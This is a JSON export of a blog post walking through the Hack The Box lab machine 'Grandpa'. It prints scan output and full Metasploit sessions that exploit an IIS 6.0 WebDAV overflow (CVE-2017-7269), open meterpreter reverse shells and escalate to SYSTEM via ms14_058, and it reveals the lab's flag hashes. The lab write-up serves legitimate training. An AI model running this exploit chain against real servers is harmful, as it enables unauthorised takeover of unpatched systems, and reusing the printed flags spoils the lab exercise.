{"id":3761,"date":"2020-08-23T14:11:30","date_gmt":"2020-08-23T05:11:30","guid":{"rendered":"https:\/\/tech.akat.info\/?p=3761"},"modified":"2020-08-30T23:31:08","modified_gmt":"2020-08-30T14:31:08","slug":"hack-the-box-grandpa-walkthrough","status":"publish","type":"post","link":"https:\/\/tech.akat.info\/?p=3761","title":{"rendered":"Hack The Box &#8211; Grandpa &#8211; Walkthrough"},"content":{"rendered":"<h3>IIS 6.0 is running on port 80<\/h3>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\n# nmap -A -n -F -T5 grandpa.htb\r\nStarting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-08-23 02:48 UTC\r\nNmap scan report for grandpa.htb (10.10.10.14)\r\nHost is up (0.038s latency).\r\nNot shown: 99 filtered ports\r\nPORT   STATE SERVICE VERSION\r\n80\/tcp open  http    Microsoft IIS httpd 6.0\r\n| http-methods:\r\n|_  Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH\r\n|_http-server-header: Microsoft-IIS\/6.0\r\n|_http-title: Under Construction\r\n| http-webdav-scan:\r\n|   Server Type: Microsoft-IIS\/6.0\r\n|   WebDAV type: Unknown\r\n|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK\r\n|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH\r\n|_  Server Date: Sun, 23 Aug 2020 02:54:24 GMT\r\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\r\nOS fingerprint not ideal because: Timing level 5 (Insane) used\r\nNo OS matches for host\r\nNetwork Distance: 2 hops\r\nService Info: OS: Windows; CPE: cpe:\/o:microsoft:windows\r\n\r\n# nmap -T4 --script vuln grandpa.htb\r\nStarting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-08-23 02:49 UTC\r\nNmap scan report for grandpa.htb (10.10.10.14)\r\nHost is up (0.028s latency).\r\nNot shown: 999 filtered ports\r\nPORT   STATE SERVICE\r\n80\/tcp open  
http\r\n|_clamav-exec: ERROR: Script execution failed (use -d to debug)\r\n|_http-csrf: Couldn't find any CSRF vulnerabilities.\r\n|_http-dombased-xss: Couldn't find any DOM based XSS.\r\n| http-enum:\r\n|   \/postinfo.html: Frontpage file or folder\r\n|   \/_vti_bin\/_vti_aut\/author.dll: Frontpage file or folder\r\n|   \/_vti_bin\/_vti_aut\/author.exe: Frontpage file or folder\r\n|   \/_vti_bin\/_vti_adm\/admin.dll: Frontpage file or folder\r\n|   \/_vti_bin\/_vti_adm\/admin.exe: Frontpage file or folder\r\n|   \/_vti_bin\/fpcount.exe?Page=default.asp|Image=3: Frontpage file or folder\r\n|   \/_vti_bin\/shtml.dll: Frontpage file or folder\r\n|_  \/_vti_bin\/shtml.exe: Frontpage file or folder\r\n| http-frontpage-login:\r\n|   VULNERABLE:\r\n|   Frontpage extension anonymous login\r\n|     State: VULNERABLE\r\n|       Default installations of older versions of frontpage extensions allow anonymous logins which can lead to server compromise.\r\n|\r\n|     References:\r\n|_      http:\/\/insecure.org\/sploits\/Microsoft.frontpage.insecurities.html\r\n|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.\r\n\r\nNmap done: 1 IP address (1 host up) scanned in 539.57 seconds\r\n\r\n# perl nikto.pl -h http:\/\/grandpa.htb\/\r\n- Nikto v2.1.6\r\n---------------------------------------------------------------------------\r\n+ Target IP:          10.10.10.14\r\n+ Target Hostname:    grandpa.htb\r\n+ Target Port:        80\r\n+ Start Time:         2020-08-23 02:50:18 (GMT0)\r\n---------------------------------------------------------------------------\r\n+ Server: Microsoft-IIS\/6.0\r\n+ Retrieved microsoftofficewebserver header: 5.0_Pub\r\n+ Retrieved x-powered-by header: ASP.NET\r\n+ The anti-clickjacking X-Frame-Options header is not present.\r\n+ The X-XSS-Protection header is not defined. 
This header can hint to the user agent to protect against some forms of XSS\r\n+ Uncommon header 'microsoftofficewebserver' found, with contents: 5.0_Pub\r\n+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type.\r\n+ Retrieved x-aspnet-version header: 1.1.4322\r\n+ No CGI Directories found (use '-C all' to force check all possible dirs)\r\n+ Retrieved dasl header: &lt;DAV:sql&gt;\r\n+ Retrieved dav header: 1, 2\r\n+ Retrieved ms-author-via header: MS-FP\/4.0,DAV\r\n+ Uncommon header 'ms-author-via' found, with contents: MS-FP\/4.0,DAV\r\n+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH\r\n+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.\r\n+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.\r\n+ OSVDB-5647: HTTP method ('Allow' Header): 'MOVE' may allow clients to change file locations on the web server.\r\n+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH\r\n+ OSVDB-5646: HTTP method ('Public' Header): 'DELETE' may allow clients to remove files on the web server.\r\n+ OSVDB-397: HTTP method ('Public' Header): 'PUT' method could allow clients to save files on the web server.\r\n+ OSVDB-5647: HTTP method ('Public' Header): 'MOVE' may allow clients to change file locations on the web server.\r\n+ WebDAV enabled (PROPFIND SEARCH UNLOCK COPY MKCOL LOCK PROPPATCH listed as allowed)\r\n+ OSVDB-13431: PROPFIND HTTP verb may show the server's internal IP address: http:\/\/10.10.10.14\/\r\n+ OSVDB-396: \/_vti_bin\/shtml.exe: Attackers may be able to crash FrontPage by requesting a DOS device, like shtml.exe\/aux.htm -- a DoS was not attempted.\r\n+ OSVDB-3233: \/postinfo.html: Microsoft FrontPage default 
file found.\r\n+ OSVDB-3233: \/_vti_inf.html: FrontPage\/SharePoint is installed and reveals its version number (check HTML source for more information).\r\n+ OSVDB-3500: \/_vti_bin\/fpcount.exe: Frontpage counter CGI has been found. FP Server version 97 allows remote users to execute arbitrary system commands, though a vulnerability in this version could not be confirmed. http:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-1999-1376. http:\/\/www.securityfocus.com\/bid\/2252.\r\n+ OSVDB-67: \/_vti_bin\/shtml.dll\/_vti_rpc: The anonymous FrontPage user is revealed through a crafted POST.\r\n+ \/_vti_bin\/_vti_adm\/admin.dll: FrontPage\/SharePoint file found.\r\n+ 8108 requests: 3 error(s) and 27 item(s) reported on remote host\r\n+ End Time:           2020-08-23 03:16:32 (GMT0) (1574 seconds)\r\n---------------------------------------------------------------------------\r\n+ 1 host(s) tested\r\n<\/pre>\n<p><a href=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-23_115645.png\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-23_115645-300x245.png\" alt=\"\" width=\"300\" height=\"245\" class=\"alignnone size-medium wp-image-3762\" srcset=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-23_115645-300x245.png 300w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-23_115645-1024x835.png 1024w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-23_115645-768x627.png 768w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-23_115645.png 1070w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<h3>Investigating starting from CVE-2017-7269<\/h3>\n<p>Searching for [IIS 6.0 exploit] turned up CVE-2017-7269 as the most prominent result, so I decided to try that first.<\/p>\n<pre class=\"brush: plain; 
title: ; notranslate\" title=\"\">\r\n# msfconsole\r\n\r\nmsf5 &gt; search CVE-2017-7269\r\n\r\nMatching Modules\r\n================\r\n\r\n   #  Name                                                 Disclosure Date  Rank    Check  Description\r\n   -  ----                                                 ---------------  ----    -----  -----------\r\n   0  exploit\/windows\/iis\/iis_webdav_scstoragepathfromurl  2017-03-26       manual  Yes    Microsoft IIS WebDav ScStoragePathFromUrl Overflow\r\n\r\nmsf5 &gt; use 0\r\n&#x5B;*] No payload configured, defaulting to windows\/meterpreter\/reverse_tcp\r\nmsf5 exploit(windows\/iis\/iis_webdav_scstoragepathfromurl) &gt; show options\r\n\r\nModule options (exploit\/windows\/iis\/iis_webdav_scstoragepathfromurl):\r\n\r\n   Name           Current Setting  Required  Description\r\n   ----           ---------------  --------  -----------\r\n   MAXPATHLENGTH  60               yes       End of physical path brute force\r\n   MINPATHLENGTH  3                yes       Start of physical path brute force\r\n   Proxies                         no        A proxy chain of format type:host:port&#x5B;,type:host:port]&#x5B;...]\r\n   RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:&lt;path&gt;'\r\n   RPORT          80               yes       The target port (TCP)\r\n   SSL            false            no        Negotiate SSL\/TLS for outgoing connections\r\n   TARGETURI      \/                yes       Path of IIS 6 web application\r\n   VHOST                           no        HTTP server virtual host\r\n\r\n\r\nPayload options (windows\/meterpreter\/reverse_tcp):\r\n\r\n   Name      Current Setting  Required  Description\r\n   ----      ---------------  --------  -----------\r\n   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)\r\n   LHOST     172.17.0.2       yes       The listen address (an interface may be specified)\r\n  
 LPORT     4444             yes       The listen port\r\n\r\n\r\nExploit target:\r\n\r\n   Id  Name\r\n   --  ----\r\n   0   Microsoft Windows Server 2003 R2 SP2 x86\r\n\r\n\r\nmsf5 exploit(windows\/iis\/iis_webdav_scstoragepathfromurl) &gt; set RHOSTS grandpa.htb\r\nRHOSTS =&gt; grandpa.htb\r\n\r\nmsf5 exploit(windows\/iis\/iis_webdav_scstoragepathfromurl) &gt; set LHOST 10.10.14.21\r\nLHOST =&gt; 10.10.14.21\r\n\r\nmsf5 exploit(windows\/iis\/iis_webdav_scstoragepathfromurl) &gt; check\r\n&#x5B;+] 10.10.10.14:80 - The target is vulnerable.\r\n\r\nmsf5 exploit(windows\/iis\/iis_webdav_scstoragepathfromurl) &gt; exploit\r\n\r\n&#x5B;-] Handler failed to bind to 10.10.14.21:4444:-  -\r\n&#x5B;*] Started reverse TCP handler on 0.0.0.0:4444\r\n&#x5B;*] Trying path length 3 to 60 ...\r\n&#x5B;*] Sending stage (176195 bytes) to 172.17.0.1\r\n&#x5B;*] Meterpreter session 1 opened (172.17.0.2:4444 -&gt; 172.17.0.1:52034) at 2020-08-23 04:27:32 +0000\r\n\r\nmeterpreter &gt; getuid\r\n&#x5B;-] stdapi_sys_config_getuid: Operation failed: Access is denied.\r\n\r\nmeterpreter &gt; ps\r\n\r\nProcess List\r\n============\r\n\r\n PID   PPID  Name               Arch  Session  User                          Path\r\n ---   ----  ----               ----  -------  ----                          ----\r\n 0     0     &#x5B;System Process]\r\n 4     0     System\r\n 272   4     smss.exe\r\n 324   272   csrss.exe\r\n 348   272   winlogon.exe\r\n 396   348   services.exe\r\n 408   348   lsass.exe\r\n 616   396   svchost.exe\r\n 676   396   svchost.exe\r\n 740   396   svchost.exe\r\n 764   396   svchost.exe\r\n 800   396   svchost.exe\r\n 936   396   spoolsv.exe\r\n 964   396   msdtc.exe\r\n 1076  396   cisvc.exe\r\n 1116  396   svchost.exe\r\n 1176  396   inetinfo.exe\r\n 1216  396   svchost.exe\r\n 1328  396   VGAuthService.exe\r\n 1408  396   vmtoolsd.exe\r\n 1456  396   svchost.exe\r\n 1600  396   svchost.exe\r\n 1700  396   alg.exe\r\n 1800  616   wmiprvse.exe       x86   0        NT 
AUTHORITY\\NETWORK SERVICE  C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe\r\n 1832  348   logon.scr\r\n 1912  396   dllhost.exe\r\n 2180  1456  w3wp.exe           x86   0        NT AUTHORITY\\NETWORK SERVICE  c:\\windows\\system32\\inetsrv\\w3wp.exe\r\n 2248  616   davcdata.exe       x86   0        NT AUTHORITY\\NETWORK SERVICE  C:\\WINDOWS\\system32\\inetsrv\\davcdata.exe\r\n 2304  2180  rundll32.exe       x86   0                                      C:\\WINDOWS\\system32\\rundll32.exe\r\n 2404  1076  cidaemon.exe\r\n 2416  1076  cidaemon.exe\r\n 2460  1076  cidaemon.exe\r\n 2484  616   wmiprvse.exe\r\n\r\nmeterpreter &gt; migrate 1800\r\n&#x5B;*] Migrating from 2304 to 1800...\r\n&#x5B;*] Migration completed successfully.\r\n\r\nmeterpreter &gt; getuid\r\nServer username: NT AUTHORITY\\NETWORK SERVICE\r\n\r\nmeterpreter &gt; background\r\n&#x5B;*] Backgrounding session 1...\r\n<\/pre>\n<h3>Looking for vulnerabilities with local_exploit_suggester<\/h3>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\nmsf5 exploit(windows\/iis\/iis_webdav_scstoragepathfromurl) &gt; use post\/multi\/recon\/local_exploit_suggester\r\n\r\nmsf5 post(multi\/recon\/local_exploit_suggester) &gt; set SESSION 1\r\nSESSION =&gt; 1\r\n\r\nmsf5 post(multi\/recon\/local_exploit_suggester) &gt; exploit\r\n\r\n&#x5B;*] 10.10.10.14 - Collecting local exploits for x86\/windows...\r\n&#x5B;*] 10.10.10.14 - 34 exploit checks are being tried...\r\n&#x5B;+] 10.10.10.14 - exploit\/windows\/local\/ms10_015_kitrap0d: The service is running, but could not be validated.\r\n&#x5B;+] 10.10.10.14 - exploit\/windows\/local\/ms14_058_track_popup_menu: The target appears to be vulnerable.\r\n&#x5B;+] 10.10.10.14 - exploit\/windows\/local\/ms14_070_tcpip_ioctl: The target appears to be vulnerable.\r\n&#x5B;+] 10.10.10.14 - exploit\/windows\/local\/ms15_051_client_copy_image: The target appears to be vulnerable.\r\n&#x5B;+] 10.10.10.14 - 
exploit\/windows\/local\/ms16_016_webdav: The service is running, but could not be validated.\r\n&#x5B;+] 10.10.10.14 - exploit\/windows\/local\/ms16_075_reflection: The target appears to be vulnerable.\r\n&#x5B;+] 10.10.10.14 - exploit\/windows\/local\/ppr_flatten_rec: The target appears to be vulnerable.\r\n&#x5B;*] Post module execution completed\r\n<\/pre>\n<h3>Escalating privileges with ms14_058_track_popup_menu<\/h3>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\nmsf5 post(multi\/recon\/local_exploit_suggester) &gt; use exploit\/windows\/local\/ms14_058_track_popup_menu\r\n&#x5B;*] Using configured payload windows\/meterpreter\/reverse_tcp\r\n\r\nmsf5 exploit(windows\/local\/ms14_058_track_popup_menu) &gt; set SESSION 1\r\nSESSION =&gt; 1\r\n\r\nmsf5 exploit(windows\/local\/ms14_058_track_popup_menu) &gt; set LHOST 10.10.14.21\r\nLHOST =&gt; 10.10.14.21\r\n\r\nmsf5 exploit(windows\/local\/ms14_058_track_popup_menu) &gt; exploit\r\n\r\n&#x5B;-] Handler failed to bind to 10.10.14.21:4444:-  -\r\n&#x5B;*] Started reverse TCP handler on 0.0.0.0:4444\r\n&#x5B;*] Launching notepad to host the exploit...\r\n&#x5B;+] Process 3052 launched.\r\n&#x5B;*] Reflectively injecting the exploit DLL into 3052...\r\n&#x5B;*] Injecting exploit into 3052...\r\n&#x5B;*] Exploit injected. Injecting payload into 3052...\r\n&#x5B;*] Payload injected. 
Executing exploit...\r\n&#x5B;+] Exploit finished, wait for (hopefully privileged) payload execution to complete.\r\n&#x5B;*] Sending stage (176195 bytes) to 172.17.0.1\r\n&#x5B;*] Meterpreter session 2 opened (172.17.0.2:4444 -&gt; 172.17.0.1:43704) at 2020-08-23 04:44:33 +0000\r\n\r\nmeterpreter &gt; getuid\r\nServer username: NT AUTHORITY\\SYSTEM\r\n\r\nmeterpreter &gt; shell\r\nProcess 2352 created.\r\nChannel 2 created.\r\nMicrosoft Windows &#x5B;Version 5.2.3790]\r\n(C) Copyright 1985-2003 Microsoft Corp.\r\n\r\nC:\\WINDOWS\\system32&gt;whoami\r\nwhoami\r\nnt authority\\system\r\n\r\nC:\\WINDOWS\\system32&gt;type &quot;C:\\Documents and Settings\\Harry\\Desktop\\user.txt&quot;\r\ntype &quot;C:\\Documents and Settings\\Harry\\Desktop\\user.txt&quot;\r\nbdff5ec67c3cff017f2bedc146a5d869\r\n\r\nC:\\WINDOWS\\system32&gt;type &quot;C:\\Documents and Settings\\Administrator\\Desktop\\root.txt&quot;\r\ntype &quot;C:\\Documents and Settings\\Administrator\\Desktop\\root.txt&quot;\r\n9359e905a2c35f861f6a57cecf28bb7b\r\n<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>IIS 6.0 is running on port 80 # nmap -A -n -F -T5 grandpa.htb Starting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-08-23 02 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[100,98],"tags":[],"_links":{"self":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3761"}],"collection":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3761"}],"version-history":[{"count":2,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3761\/revisions"}],"predecessor-version":[{"id":3779,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3761\/revisions\/3779"}],"wp:attachment":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3761"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3761"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3761"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}